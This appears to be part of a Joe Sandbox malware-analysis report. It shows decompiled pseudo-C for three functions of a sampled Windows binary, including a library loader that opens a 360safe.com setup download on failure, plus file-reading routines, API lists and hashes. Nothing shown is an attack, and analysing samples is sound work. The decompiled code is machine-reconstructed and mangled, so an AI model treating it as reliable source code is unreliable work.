                                                                                                                                                                                          			E00C8E730(void* __ebx, void* __eflags, WCHAR* _a4) {
				char _v4;
				void* _t6;
				struct HINSTANCE__* _t7;
				WCHAR* _t11;

				_t11 = _a4;
				_v4 = 0;
				_t6 = E00C8E370(__eflags, _t11, 1, 0,  &_v4); // executed
				if(_t6 != 0) {
					_t7 = LoadLibraryW(_t11); // executed
					return _t7;
				} else {
					_t16 = _v4 - _t6;
					if(_v4 == _t6) {
						_push(1);
						_push("360");
						_push(_t11);
						E00C8E940(__ebx, _t16);
					}
					return 0;
				}
			}







                                                                                                                                                                                          0x00c8e732
                                                                                                                                                                                          0x00c8e740
                                                                                                                                                                                          0x00c8e748
                                                                                                                                                                                          0x00c8e74f
                                                                                                                                                                                          0x00c8e76f
                                                                                                                                                                                          0x00c8e777
                                                                                                                                                                                          0x00c8e751
                                                                                                                                                                                          0x00c8e751
                                                                                                                                                                                          0x00c8e755
                                                                                                                                                                                          0x00c8e757
                                                                                                                                                                                          0x00c8e759
                                                                                                                                                                                          0x00c8e75e
                                                                                                                                                                                          0x00c8e75f
                                                                                                                                                                                          0x00c8e764
                                                                                                                                                                                          0x00c8e76b
                                                                                                                                                                                          0x00c8e76b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,?,00000001,00000000,?,00000000,?,00C8E906,?), ref: 00C8E76F
                                                                                                                                                                                            • Part of subcall function 00C8E940: _memset.LIBCMT ref: 00C8E972
                                                                                                                                                                                            • Part of subcall function 00C8E940: _wcsncpy.LIBCMT ref: 00C8E989
                                                                                                                                                                                            • Part of subcall function 00C8E940: _wcsncat.LIBCMT ref: 00C8E99C
                                                                                                                                                                                            • Part of subcall function 00C8E940: _wcsncat.LIBCMT ref: 00C8E9B3
                                                                                                                                                                                            • Part of subcall function 00C8E940: _wcsncat.LIBCMT ref: 00C8E9C6
                                                                                                                                                                                            • Part of subcall function 00C8E940: _wcsncat.LIBCMT ref: 00C8E9DD
                                                                                                                                                                                            • Part of subcall function 00C8E940: _wcsncat.LIBCMT ref: 00C8E9F0
                                                                                                                                                                                            • Part of subcall function 00C8E940: _wcsncat.LIBCMT ref: 00C8EA07
                                                                                                                                                                                            • Part of subcall function 00C8E940: GetActiveWindow.USER32 ref: 00C8EA17
                                                                                                                                                                                            • Part of subcall function 00C8E940: MessageBoxW.USER32(00000000), ref: 00C8EA1E
                                                                                                                                                                                            • Part of subcall function 00C8E940: __wcsnicmp.LIBCMT ref: 00C8EA3A
                                                                                                                                                                                            • Part of subcall function 00C8E940: ShellExecuteW.SHELL32(00000000,open,http://down.360safe.com/setup.exe,00000000,00000000,00000005), ref: 00C8EA6E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsncat$ActiveExecuteLibraryLoadMessageShellWindow__wcsnicmp_memset_wcsncpy
                                                                                                                                                                                          • String ID: 360
                                                                                                                                                                                          • API String ID: 4220467963-1990796034
                                                                                                                                                                                          • Opcode ID: 264a80a6f79de47f7c78fbd7c4f4409567a4b1d9cd82ac3e20da6777c5314e79
                                                                                                                                                                                          • Instruction ID: e0cc1b49dbe2197e83c45328a6be59d1f32dcf878819f3fbccd5973172340869
                                                                                                                                                                                          • Opcode Fuzzy Hash: 264a80a6f79de47f7c78fbd7c4f4409567a4b1d9cd82ac3e20da6777c5314e79
                                                                                                                                                                                          • Instruction Fuzzy Hash: ECE092722163206EDA10B6506D05FDB738C8F5171DF00842AF641E1090E2B05A0497BA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C84410 Relevance: 3.2, APIs: 2, Instructions: 226COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                          			E00C84410(void** __edi, union _LARGE_INTEGER _a4, union _LARGE_INTEGER* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				void* _v24;
				void* __ebx;
				void* __esi;
				void* _t72;
				signed int _t74;
				void* _t77;
				void* _t78;
				int _t79;
				signed int _t82;
				void* _t87;
				int _t88;
				signed int _t89;
				union _LARGE_INTEGER _t108;
				void* _t113;
				void* _t114;
				signed int _t115;
				void* _t125;
				void* _t128;
				void** _t146;
				union _LARGE_INTEGER* _t149;
				void* _t150;
				signed int _t155;
				void* _t157;
				signed int _t160;
				void* _t161;
				void** _t163;
				void* _t169;

				_t146 = __edi;
				_t163 =  &_v24;
				_t128 = __edi[6];
				_t108 = _a4;
				_t160 = _a16;
				_t72 = _t160 + _t108;
				asm("adc ecx, [esp+0x28]");
				_v20 = 0;
				__edi[3] = 0;
				__edi[2] = _t72;
				_v24 = _t72;
				asm("adc eax, [edi+0x14]");
				_v8 = _t128 + __edi[4];
				_v16 = __edi[8];
				_t113 = __edi[9];
				_t169 = _v20 - _t113;
				_v12 = _t113;
				if(_t169 < 0 || _t169 <= 0 && _v24 <= _v16) {
					_t114 = _t146[5];
					_t149 = _a8;
					__eflags = _t149 - _t114;
					if(__eflags > 0) {
						L14:
						__eflags = _t149;
						if(__eflags > 0) {
							goto L22;
						} else {
							if(__eflags < 0) {
								L17:
								__eflags = _v20;
								if(__eflags > 0) {
									L21:
									_t96 = _t108 - _t146[4];
									_t157 = _t128 - _t108 - _t146[4];
									E00D06580(_t108, _t146, _t157, _a12, _t146[0xa] + _t96, _t157);
									_a12 = _a12 + _t157;
									_t163 =  &(_t163[3]);
									_t108 = _t108 + _t157;
									asm("adc dword [esp+0x2c], 0x0");
									_t160 = _t160 - _t157;
									__eflags = _t160;
									_t149 = _a8;
									goto L22;
								} else {
									if(__eflags < 0) {
										L20:
										_t143 = _t146[0xa] - _t146[4] + _t108;
										__eflags = _t146[0xa] - _t146[4] + _t108;
										E00D06580(_t108, _t146, _t149, _a12, _t143, _t160);
										return 1;
									} else {
										__eflags = _v24 - _v8;
										if(_v24 > _v8) {
											goto L21;
										} else {
											goto L20;
										}
									}
								}
							} else {
								__eflags = _t108 - _v8;
								if(_t108 >= _v8) {
									goto L22;
								} else {
									goto L17;
								}
							}
						}
					} else {
						if(__eflags < 0) {
							L7:
							__eflags = _v20 - _t114;
							if(__eflags >= 0) {
								_t125 = _v24;
								if(__eflags > 0) {
									L10:
									__eflags = _v20;
									if(__eflags <= 0) {
										if(__eflags < 0) {
											L13:
											_t101 = _t146[4];
											_t160 = _t146[4] - _t108;
											E00D06580(_t108, _t146, _t149, _a12 + _t160, _t146[0xa], _t125 - _t101);
											_t163 =  &(_t163[3]);
										} else {
											__eflags = _t125 - _v8;
											if(_t125 <= _v8) {
												goto L13;
											}
										}
									}
								} else {
									__eflags = _t125 - _t146[4];
									if(_t125 > _t146[4]) {
										goto L10;
									}
								}
							}
							L22:
							_t115 = _t146[0xb];
							_t74 = _t160;
							__eflags = _t74 / _t115;
							if(_t74 / _t115 == 0) {
								_t77 = _v16 - _t108;
								asm("sbb ecx, esi");
								__eflags = _v12;
								if(__eflags >= 0) {
									if(__eflags > 0) {
										L30:
										_t77 = _t146[0xb];
									} else {
										__eflags = _t77 - _t146[0xb];
										if(_t77 >= _t146[0xb]) {
											goto L30;
										}
									}
								}
								_push(0);
								_t146[6] = _t77;
								_t150 = _t77;
								_t78 =  *_t146;
								_a16 = _t146[0xa];
								_v24 = _t78;
								_t79 = SetFilePointerEx(_t78, _t108, _a8, 0); // executed
								__eflags = _t79;
								if(_t79 == 0) {
									goto L24;
								} else {
									_t82 = E00C83E90(_v24, _t150);
									__eflags = _t82;
									if(_t82 != 0) {
										_t146[4] = _t108;
										_t146[5] = _a8;
										E00D06580(_t108, _t146, _t150, _a12, _t146[0xa], _t160);
										return 1;
									} else {
										goto L33;
									}
								}
							} else {
								_t87 =  *_t146;
								_push(0);
								_a16 = _t87;
								_t88 = SetFilePointerEx(_t87, _t108, _t149, 0);
								__eflags = _t88;
								if(_t88 != 0) {
									_t89 = E00C83E90(_a16, _t160);
									__eflags = _t89;
									if(_t89 == 0) {
										L33:
										__eflags = 0;
										return 0;
									} else {
										_t155 = _t146[0xb];
										_t161 = _t160 - _t155;
										asm("adc ecx, [esp+0x2c]");
										_t138 = _a12 + _t161;
										__eflags = _a12 + _t161;
										_t146[4].LowPart = _t161 + _t108;
										_t146[5] = 0;
										E00D06580(_t108, _t146, _t155, _t146[0xa], _t138, _t155);
										_t146[6] = _t155;
										return 1;
									}
								} else {
									L24:
									_push(0xd47270);
									_push(0);
									_push(0);
									E00C88150(0xd47270);
									__eflags = 0;
									return 0;
								}
							}
						} else {
							__eflags = _t108 - _t146[4].LowPart;
							if(_t108 >= _t146[4].LowPart) {
								goto L14;
							} else {
								goto L7;
							}
						}
					}
				} else {
					E00C88420(1, 0xd47270);
					return 0;
				}
			}


































                                                                                                                                                                                          0x00c84410
                                                                                                                                                                                          0x00c84410
                                                                                                                                                                                          0x00c84413
                                                                                                                                                                                          0x00c84417
                                                                                                                                                                                          0x00c8441c
                                                                                                                                                                                          0x00c84422
                                                                                                                                                                                          0x00c84429
                                                                                                                                                                                          0x00c84431
                                                                                                                                                                                          0x00c84435
                                                                                                                                                                                          0x00c84438
                                                                                                                                                                                          0x00c8443b
                                                                                                                                                                                          0x00c84445
                                                                                                                                                                                          0x00c84448
                                                                                                                                                                                          0x00c8444f
                                                                                                                                                                                          0x00c84453
                                                                                                                                                                                          0x00c84456
                                                                                                                                                                                          0x00c8445a
                                                                                                                                                                                          0x00c8445e
                                                                                                                                                                                          0x00c84487
                                                                                                                                                                                          0x00c8448a
                                                                                                                                                                                          0x00c8448e
                                                                                                                                                                                          0x00c84490
                                                                                                                                                                                          0x00c844e9
                                                                                                                                                                                          0x00c844e9
                                                                                                                                                                                          0x00c844eb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c844ed
                                                                                                                                                                                          0x00c844ed
                                                                                                                                                                                          0x00c844f5
                                                                                                                                                                                          0x00c844f5
                                                                                                                                                                                          0x00c844f9
                                                                                                                                                                                          0x00c8452a
                                                                                                                                                                                          0x00c8452f
                                                                                                                                                                                          0x00c84534
                                                                                                                                                                                          0x00c8453f
                                                                                                                                                                                          0x00c84544
                                                                                                                                                                                          0x00c84548
                                                                                                                                                                                          0x00c8454b
                                                                                                                                                                                          0x00c8454d
                                                                                                                                                                                          0x00c84552
                                                                                                                                                                                          0x00c84552
                                                                                                                                                                                          0x00c84554
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c844fb
                                                                                                                                                                                          0x00c844fb
                                                                                                                                                                                          0x00c84507
                                                                                                                                                                                          0x00c84512
                                                                                                                                                                                          0x00c84512
                                                                                                                                                                                          0x00c84516
                                                                                                                                                                                          0x00c84529
                                                                                                                                                                                          0x00c844fd
                                                                                                                                                                                          0x00c84501
                                                                                                                                                                                          0x00c84505
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84505
                                                                                                                                                                                          0x00c844fb
                                                                                                                                                                                          0x00c844ef
                                                                                                                                                                                          0x00c844ef
                                                                                                                                                                                          0x00c844f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c844f3
                                                                                                                                                                                          0x00c844ed
                                                                                                                                                                                          0x00c84492
                                                                                                                                                                                          0x00c84492
                                                                                                                                                                                          0x00c84499
                                                                                                                                                                                          0x00c84499
                                                                                                                                                                                          0x00c8449d
                                                                                                                                                                                          0x00c844a3
                                                                                                                                                                                          0x00c844a7
                                                                                                                                                                                          0x00c844b4
                                                                                                                                                                                          0x00c844b4
                                                                                                                                                                                          0x00c844b8
                                                                                                                                                                                          0x00c844be
                                                                                                                                                                                          0x00c844ca
                                                                                                                                                                                          0x00c844ca
                                                                                                                                                                                          0x00c844d9
                                                                                                                                                                                          0x00c844df
                                                                                                                                                                                          0x00c844e4
                                                                                                                                                                                          0x00c844c0
                                                                                                                                                                                          0x00c844c0
                                                                                                                                                                                          0x00c844c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c844c4
                                                                                                                                                                                          0x00c844be
                                                                                                                                                                                          0x00c844a9
                                                                                                                                                                                          0x00c844ac
                                                                                                                                                                                          0x00c844ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c844ae
                                                                                                                                                                                          0x00c844a7
                                                                                                                                                                                          0x00c84558
                                                                                                                                                                                          0x00c84558
                                                                                                                                                                                          0x00c8455d
                                                                                                                                                                                          0x00c84561
                                                                                                                                                                                          0x00c84563
                                                                                                                                                                                          0x00c845f6
                                                                                                                                                                                          0x00c845f8
                                                                                                                                                                                          0x00c845fc
                                                                                                                                                                                          0x00c845fe
                                                                                                                                                                                          0x00c84600
                                                                                                                                                                                          0x00c84607
                                                                                                                                                                                          0x00c84607
                                                                                                                                                                                          0x00c84602
                                                                                                                                                                                          0x00c84602
                                                                                                                                                                                          0x00c84605
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84605
                                                                                                                                                                                          0x00c84600
                                                                                                                                                                                          0x00c84611
                                                                                                                                                                                          0x00c84616
                                                                                                                                                                                          0x00c84619
                                                                                                                                                                                          0x00c8461b
                                                                                                                                                                                          0x00c8461f
                                                                                                                                                                                          0x00c84623
                                                                                                                                                                                          0x00c84627
                                                                                                                                                                                          0x00c8462d
                                                                                                                                                                                          0x00c8462f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84635
                                                                                                                                                                                          0x00c8463d
                                                                                                                                                                                          0x00c84642
                                                                                                                                                                                          0x00c84644
                                                                                                                                                                                          0x00c8465d
                                                                                                                                                                                          0x00c84660
                                                                                                                                                                                          0x00c84663
                                                                                                                                                                                          0x00c84676
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84644
                                                                                                                                                                                          0x00c84569
                                                                                                                                                                                          0x00c84569
                                                                                                                                                                                          0x00c8456b
                                                                                                                                                                                          0x00c84572
                                                                                                                                                                                          0x00c84576
                                                                                                                                                                                          0x00c8457c
                                                                                                                                                                                          0x00c8457e
                                                                                                                                                                                          0x00c845a9
                                                                                                                                                                                          0x00c845ae
                                                                                                                                                                                          0x00c845b0
                                                                                                                                                                                          0x00c84646
                                                                                                                                                                                          0x00c84646
                                                                                                                                                                                          0x00c8464e
                                                                                                                                                                                          0x00c845b6
                                                                                                                                                                                          0x00c845b6
                                                                                                                                                                                          0x00c845bd
                                                                                                                                                                                          0x00c845c5
                                                                                                                                                                                          0x00c845ca
                                                                                                                                                                                          0x00c845ca
                                                                                                                                                                                          0x00c845cc
                                                                                                                                                                                          0x00c845d4
                                                                                                                                                                                          0x00c845d7
                                                                                                                                                                                          0x00c845dc
                                                                                                                                                                                          0x00c845ed
                                                                                                                                                                                          0x00c845ed
                                                                                                                                                                                          0x00c84580
                                                                                                                                                                                          0x00c84580
                                                                                                                                                                                          0x00c84580
                                                                                                                                                                                          0x00c84585
                                                                                                                                                                                          0x00c84587
                                                                                                                                                                                          0x00c8458e
                                                                                                                                                                                          0x00c84596
                                                                                                                                                                                          0x00c8459e
                                                                                                                                                                                          0x00c8459e
                                                                                                                                                                                          0x00c8457e
                                                                                                                                                                                          0x00c84494
                                                                                                                                                                                          0x00c84494
                                                                                                                                                                                          0x00c84497
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84497
                                                                                                                                                                                          0x00c84492
                                                                                                                                                                                          0x00c8446c
                                                                                                                                                                                          0x00c84476
                                                                                                                                                                                          0x00c84486
                                                                                                                                                                                          0x00c84486

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000CCC,?,00C84728,00000000,00000000,00000CCC,00000040), ref: 00C84576
                                                                                                                                                                                            • Part of subcall function 00C83E90: ReadFile.KERNEL32(?,?,?,?,00000000,?,00C84DC5,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C83E9B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                          • Opcode ID: 5563f820534719225689545a14a9ad927ce165099bfec9252fb7a902f518c681
                                                                                                                                                                                          • Instruction ID: 9950c8575d0c3af73647f03217509938fe6acd1829fadd223463831112c20614
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5563f820534719225689545a14a9ad927ce165099bfec9252fb7a902f518c681
                                                                                                                                                                                          • Instruction Fuzzy Hash: D3716D71604702AFD718EF68DC80A6AB3E5FB88318F444A2DF85893B41E735F9548BD6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C85690 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 73%
                                                                                                                                                                                          			E00C85690(void* __eflags, void* _a4) {
				void* _v4;
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t44;
				void* _t51;
				intOrPtr* _t55;
				void* _t61;
				void* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				void* _t69;
				void* _t70;

				_t34 = E00D017AD(_t55, _t61, _t64, 0x8cd8); // executed
				_t66 = _t34;
				_t65 = 0;
				_t69 =  &_v8 + 4;
				if(_t66 != 0) {
					_t2 = _t66 + 4; // 0x4
					_t62 = _t2;
					_t3 = _t66 + 0xccc; // 0xccc
					_push(_t2);
					 *_t66 = _a4;
					 *((intOrPtr*)(_t66 + 0xc4)) = 0;
					 *((intOrPtr*)(_t66 + 0xc8)) = 0;
					_t36 = E00C84680(_t3, _a4, __eflags);
					_t70 = _t69 + 4;
					__eflags = _t36;
					if(__eflags == 0) {
						L16:
						_push(_t66);
						E00D0092B(_t55, _t62, _t65, _t66, __eflags);
						__eflags = 0;
						return 0;
					} else {
						_t39 =  *((intOrPtr*)(_t66 + 0x10));
						__eflags = _t39;
						if(_t39 == 0) {
							L17:
							 *((intOrPtr*)(_t66 + 0x10)) = _t65;
							 *((intOrPtr*)(_t66 + 0x18)) = _t65;
							goto L18;
						} else {
							__eflags =  *((intOrPtr*)(_t66 + 0x18));
							if( *((intOrPtr*)(_t66 + 0x18)) == 0) {
								goto L17;
							} else {
								_t67 = 0;
								__eflags =  *((intOrPtr*)(_t66 + 0xc4)) - 0x100;
								_v8 = _t39;
								_v4 = 0;
								_t11 = _t66 + 0xcc; // 0xcc
								_t55 = _t11;
								if( *((intOrPtr*)(_t66 + 0xc4)) >= 0x100) {
									L13:
									_t41 = 0x10;
									goto L15;
								} else {
									while(1) {
										_t65 = _a4;
										_t15 = _t66 + 0xccc; // 0xccc
										_t44 = E00C84CB0(_t15, _a4, _t67, _v8, _v4, 1, _a4);
										_t70 = _t70 + 0x10;
										__eflags = _t44;
										if(__eflags == 0) {
											goto L16;
										}
										 *_t55 = _t67;
										_t62 =  *((intOrPtr*)(_t66 + 0xccc));
										 *((intOrPtr*)(_t55 + 4)) =  *((intOrPtr*)(_t66 + 0xccc));
										 *((short*)(_t55 + 8)) =  *((intOrPtr*)(_t66 + 0xcd2));
										__eflags =  *((intOrPtr*)(_t66 + 0xc8)) - 0xffff;
										if( *((intOrPtr*)(_t66 + 0xc8)) > 0xffff) {
											goto L13;
										} else {
											 *((short*)(_t55 + 0xa)) =  *((intOrPtr*)(_t66 + 0xc8));
											 *((intOrPtr*)(_t66 + 0xc8)) =  *((intOrPtr*)(_t66 + 0xc8)) + 1;
											_t51 = ( *((intOrPtr*)(_t66 + 0xccc)) + 7 >> 3) + ( *((intOrPtr*)(_t66 + 0xccc)) + 7 >> 3) + ( *((intOrPtr*)(_t66 + 0xccc)) + 7 >> 3) + ( *((intOrPtr*)(_t66 + 0xccc)) + 7 >> 3) + ( *((intOrPtr*)(_t66 + 0xccc)) + 7 >> 3) + ( *((intOrPtr*)(_t66 + 0xccc)) + 7 >> 3) + ( *((intOrPtr*)(_t66 + 0xccc)) + 7 >> 3) + ( *((intOrPtr*)(_t66 + 0xccc)) + 7 >> 3);
											_v8 = _v8 + _t51;
											asm("adc dword [esp+0x14], 0x0");
											 *((intOrPtr*)(_t66 + 0xc4)) =  *((intOrPtr*)(_t66 + 0xc4)) + 1;
											_t67 = _t67 + _t51;
											_t55 = _t55 + 0xc;
											__eflags = _t67 -  *((intOrPtr*)(_t66 + 0x18));
											if(__eflags == 0) {
												L18:
												return _t66;
											} else {
												if(__eflags > 0) {
													_t41 = 1;
													L15:
													E00C88420(_t41, 0xd47270);
													_t70 = _t70 + 4;
													goto L16;
												} else {
													__eflags =  *((intOrPtr*)(_t66 + 0xc4)) - 0x100;
													if( *((intOrPtr*)(_t66 + 0xc4)) < 0x100) {
														_t65 = 0;
														__eflags = 0;
														continue;
													} else {
														goto L13;
													}
												}
											}
										}
										goto L19;
									}
									goto L16;
								}
							}
						}
					}
				} else {
					SetLastError(8);
					_push(0xd47270);
					_push(0);
					_push(0);
					E00C88150(0xd47270);
					return 0;
				}
				L19:
			}






















                                                                                                                                                                                          0x00c8569c
                                                                                                                                                                                          0x00c856a1
                                                                                                                                                                                          0x00c856a3
                                                                                                                                                                                          0x00c856a5
                                                                                                                                                                                          0x00c856aa
                                                                                                                                                                                          0x00c856d6
                                                                                                                                                                                          0x00c856d6
                                                                                                                                                                                          0x00c856d9
                                                                                                                                                                                          0x00c856df
                                                                                                                                                                                          0x00c856e0
                                                                                                                                                                                          0x00c856e2
                                                                                                                                                                                          0x00c856e8
                                                                                                                                                                                          0x00c856ee
                                                                                                                                                                                          0x00c856f3
                                                                                                                                                                                          0x00c856f6
                                                                                                                                                                                          0x00c856f8
                                                                                                                                                                                          0x00c857ea
                                                                                                                                                                                          0x00c857ea
                                                                                                                                                                                          0x00c857eb
                                                                                                                                                                                          0x00c857f3
                                                                                                                                                                                          0x00c857fc
                                                                                                                                                                                          0x00c856fe
                                                                                                                                                                                          0x00c856fe
                                                                                                                                                                                          0x00c85701
                                                                                                                                                                                          0x00c85703
                                                                                                                                                                                          0x00c857fd
                                                                                                                                                                                          0x00c857fd
                                                                                                                                                                                          0x00c85800
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85709
                                                                                                                                                                                          0x00c85709
                                                                                                                                                                                          0x00c8570c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85712
                                                                                                                                                                                          0x00c85712
                                                                                                                                                                                          0x00c85714
                                                                                                                                                                                          0x00c8571e
                                                                                                                                                                                          0x00c85722
                                                                                                                                                                                          0x00c85726
                                                                                                                                                                                          0x00c85726
                                                                                                                                                                                          0x00c8572c
                                                                                                                                                                                          0x00c857d4
                                                                                                                                                                                          0x00c857d4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85732
                                                                                                                                                                                          0x00c85736
                                                                                                                                                                                          0x00c8573f
                                                                                                                                                                                          0x00c85747
                                                                                                                                                                                          0x00c8574d
                                                                                                                                                                                          0x00c85752
                                                                                                                                                                                          0x00c85755
                                                                                                                                                                                          0x00c85757
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8575d
                                                                                                                                                                                          0x00c8575f
                                                                                                                                                                                          0x00c85765
                                                                                                                                                                                          0x00c8576f
                                                                                                                                                                                          0x00c85773
                                                                                                                                                                                          0x00c8577d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8577f
                                                                                                                                                                                          0x00c85786
                                                                                                                                                                                          0x00c8578f
                                                                                                                                                                                          0x00c857a5
                                                                                                                                                                                          0x00c857a7
                                                                                                                                                                                          0x00c857ab
                                                                                                                                                                                          0x00c857b0
                                                                                                                                                                                          0x00c857b6
                                                                                                                                                                                          0x00c857bb
                                                                                                                                                                                          0x00c857be
                                                                                                                                                                                          0x00c857c0
                                                                                                                                                                                          0x00c85804
                                                                                                                                                                                          0x00c8580c
                                                                                                                                                                                          0x00c857c2
                                                                                                                                                                                          0x00c857c2
                                                                                                                                                                                          0x00c857db
                                                                                                                                                                                          0x00c857dd
                                                                                                                                                                                          0x00c857e2
                                                                                                                                                                                          0x00c857e7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c857c4
                                                                                                                                                                                          0x00c857c4
                                                                                                                                                                                          0x00c857ce
                                                                                                                                                                                          0x00c85734
                                                                                                                                                                                          0x00c85734
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c857ce
                                                                                                                                                                                          0x00c857c2
                                                                                                                                                                                          0x00c857c0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8577d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85736
                                                                                                                                                                                          0x00c8572c
                                                                                                                                                                                          0x00c8570c
                                                                                                                                                                                          0x00c85703
                                                                                                                                                                                          0x00c856ac
                                                                                                                                                                                          0x00c856ae
                                                                                                                                                                                          0x00c856b4
                                                                                                                                                                                          0x00c856b9
                                                                                                                                                                                          0x00c856ba
                                                                                                                                                                                          0x00c856c0
                                                                                                                                                                                          0x00c856d1
                                                                                                                                                                                          0x00c856d1
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00C8569C
                                                                                                                                                                                            • Part of subcall function 00D017AD: __FF_MSGBANNER.LIBCMT ref: 00D017D0
                                                                                                                                                                                            • Part of subcall function 00D017AD: __NMSG_WRITE.LIBCMT ref: 00D017D7
                                                                                                                                                                                            • Part of subcall function 00D017AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5), ref: 00D01824
                                                                                                                                                                                          • SetLastError.KERNEL32(00000008,00000000,00C8291E,00000000,00002000,?,00000000), ref: 00C856AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
